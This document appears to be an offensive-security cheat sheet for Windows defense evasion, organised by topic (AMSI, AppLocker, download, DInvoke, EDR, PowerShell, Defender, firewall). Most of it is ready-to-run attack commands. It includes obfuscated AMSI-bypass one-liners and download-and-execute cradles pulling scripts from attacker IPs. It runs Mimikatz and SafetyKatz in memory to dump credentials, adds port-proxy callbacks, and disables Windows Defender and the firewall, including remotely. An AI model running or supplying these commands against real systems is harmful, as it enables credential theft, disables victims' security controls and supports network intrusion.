evasion / win

Mitre Att&ck Entreprise: TA0005 - Defense Evasion

Menu

• amsi
• applocker
• download
• dinvoke
• edr
• powershell
• windows-defender
• windows-firewall
• S3cur3Th1sSh1t

Tools

_repo	_last_push	_stars	_watch	_language

amsi

# amsi evasion # local # 01
# https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

# amsi evasion # local # 02
S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') +
('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;
(
Get-
varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f
'.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f
'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"(
( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f
'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}"
-f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# amsi evasion # rshell # 01
iex (iwr http://$ztarg_computer_ip/amsibypass.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://'$ztarg_computer_ip'/PowerView.ps1'))

• amsi.fails
• S3cur3Th1sSh1t
• notes.offsec-journey.com

applocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

download

# lolbas mpcmdrun.exe 
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>

# download fuzzed mimikatz
(New-Object Net.WebClient).DownloadString('http://10.1.3.40/mimi/mimikatz.ps1'); Invoke-Dummy  -DumpEvenMoreDummy)

# 
$r=New-Object System.Net.WebClient;$r.DownloadFile('http://10.1.3.40/mimi/mimi.zip', 'c:\temp\mimi.zip')

# run mimikartz into memory
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

dinvoke

# download dinvoke on a host 
iwr http://$zlat_computer_ip/Loader.exe -OutFile C:\Users\Public\Loader.exe

# upload dinvoke on a remote host 
echo F | xcopy C:\Users\Public\Loader.exe \\$ztarg_computer_ip\C$\Users\Public\Loader.exe

# execute safekatz via dinvoke 
C:\Users\Public\Loader.exe -path http://$zlat_computer_ip/SafetyKatz.exe -Args %Pwn% exit

# execute safekatz via dinvoke, http callback proxied on localhost  
$null |winrs -r:$ztarg_computer_name "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=$zlat_computer_ip"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit

edr

Invoke-EDRChecker

# crowdstrike falcon
Get-Service | Where-Object{$_.DisplayName -like "*falcon*"}

# palo cortex xdr 
cd "C:\Program Files\Palo Alto Networks\Traps"
./cytool.exe
dir HKLM:\SYSTEM\CurrentControlSet\Services\CryptSvc

powershell

# powershell execution protection bypass
powershell -ep bypass

# powershell fullLanguage / Constrained language mode
# https://seyptoo.github.io/clm-applocker/
$Env:__PSLockdownPolicy
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v __PSLockdownPolicy
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v __PSLockdownPolicy /t REG_SZ /d ConstrainedLanguage /f
/v fDenyTSConnections /t REG_DWORD /d 1 /f
$ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode ConstrainedLanguage

# https://github.com/OmerYa/Invisi-Shell
# bypasses all of Powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies
RunWithRegistryNonAdmin.bat

windows-defender

# disable windows defender
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true

# disable windows defender remotely via pssession
$sess = New-PSSession -ComputerName $ztarg_computer_fqdn
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

# set local proxy redirection 
$null | winrs -r:$ztarg_computer_name "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=$zlat_computer_ip"

windows-firewall

# windows firewall showing / disabling config 
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

S3cur3Th1sSh1t